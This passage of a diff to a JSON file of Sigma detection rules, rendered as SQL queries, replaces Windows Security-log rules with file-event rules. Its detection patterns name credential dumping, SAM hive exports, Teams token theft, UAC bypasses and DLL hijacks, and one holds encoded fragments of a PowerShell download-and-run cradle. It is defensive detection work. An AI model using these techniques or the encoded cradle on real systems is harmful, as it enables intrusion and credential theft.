'%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.003" + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task 
persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": 
"@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": 
"d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + 
"title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": 
"2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs 
WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research 
(OTR)", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1574.001" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": 
"file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": 
"Roberto Rodriguez @Cyb3rWard0g", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - 
"attack.t1558.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 
'%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": 
[ + "attack.execution", "attack.privilege_escalation", - "attack.credential_access" + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + 
"attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": 